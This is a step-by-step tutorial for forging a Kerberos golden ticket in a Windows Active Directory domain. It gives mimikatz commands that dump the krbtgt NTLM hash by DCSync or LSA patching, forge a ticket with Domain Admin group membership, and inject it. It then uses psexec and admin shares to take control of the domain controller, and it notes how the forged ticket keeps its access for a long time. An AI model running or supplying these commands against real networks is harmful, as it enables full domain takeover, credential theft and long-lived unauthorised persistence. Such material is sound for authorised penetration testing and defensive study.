Golden Ticket

Check whether you already have the privileges you need (a golden ticket is forged from the krbtgt hash, and getting that hash needs domain admin or DCSync rights):

psexec.exe \\dc_name cmd.exe 

If this fails (no admin shell on the domain controller), you can't dump the krbtgt hash yet, so the golden ticket won't work either; escalate first.

What you need:

  1. Domain name: the DNS name of the domain (domain.local in the examples below), not the short NetBIOS name that appears before the backslash in your username.

  2. Domain SID:

whoami /user

This prints your user SID, e.g. S-1-5-21-xxx-yyy-zzz-1105. The domain SID is everything before the last dash; drop the trailing RID (1105 here), mimikatz wants only the S-1-5-21-xxx-yyy-zzz part.

  3. KRBTGT NTLM hash (requires elevated priv: domain admin or DCSync/replication rights) -> the krbtgt key is what the DC uses to encrypt and verify every TGT, so if we can obtain it, we can create our own TGT.

  • The forged TGT can claim that any user, even a non-existent one, is a member of the Domain Admins group ---> the DC never checks that claim against AD; it trusts whatever the ticket says as long as it is encrypted correctly with the krbtgt key.

  • The krbtgt password doesn't change automatically, and the DC accepts tickets made with the current and the previous krbtgt key, so the forged ticket keeps working until the krbtgt password has been changed twice!

run mimikatz (elevated)

and

lsadump::dcsync /domain:domainname.local /user:krbtgt
or 
lsadump::lsa /patch 

dcsync works from any domain-joined host with replication (DA) rights; lsadump::lsa /patch has to run on the DC itself. Either way, copy the "Hash NTLM" value for the krbtgt account.

--

Use the golden ticket to get domain admin access with the information you got!

on the mimikatz command line,

kerberos::golden /domain:domain.local /sid:SID_Value  /rc4:NTLM_HASH /id:500 /user:gori
  • /id -> the RID the ticket claims for the user; 500 is the built-in Administrator. By default mimikatz also puts the groups 513, 512 (Domain Admins), 520, 518 and 519 into the ticket.

  • /user -> name it whatever! No account is actually created; the name only goes into the ticket, so it doesn't even have to exist in AD.

After you create the ticket (mimikatz writes it to ticket.kirbi by default), pass the ticket into your current logon session:

kerberos::ptt ticket.kirbi

if you launch a command prompt now

misc::cmd

you will have the privileges of a domain admin! You can access the domain controller's file shares (and the ticket doesn't expire for a long time: mimikatz forges it with a 10-year lifetime by default, and it only stops working once the krbtgt password has been changed twice!!!)

pushd \\domain_Controller\c$

or

psexec.exe \\dc01 cmd.exe 

to launch a command prompt on the domain controller as the forged user. Use the DC's hostname, not its IP address: with an IP, Windows falls back to NTLM and the injected Kerberos ticket is never used.

check your group memberships in that remote shell on the DC:

whoami /groups 

It should list Domain Admins and the other groups from the forged ticket. Run locally, whoami /groups still shows your original logon token, because the injected ticket only changes how you authenticate over the network, not who the local session is.
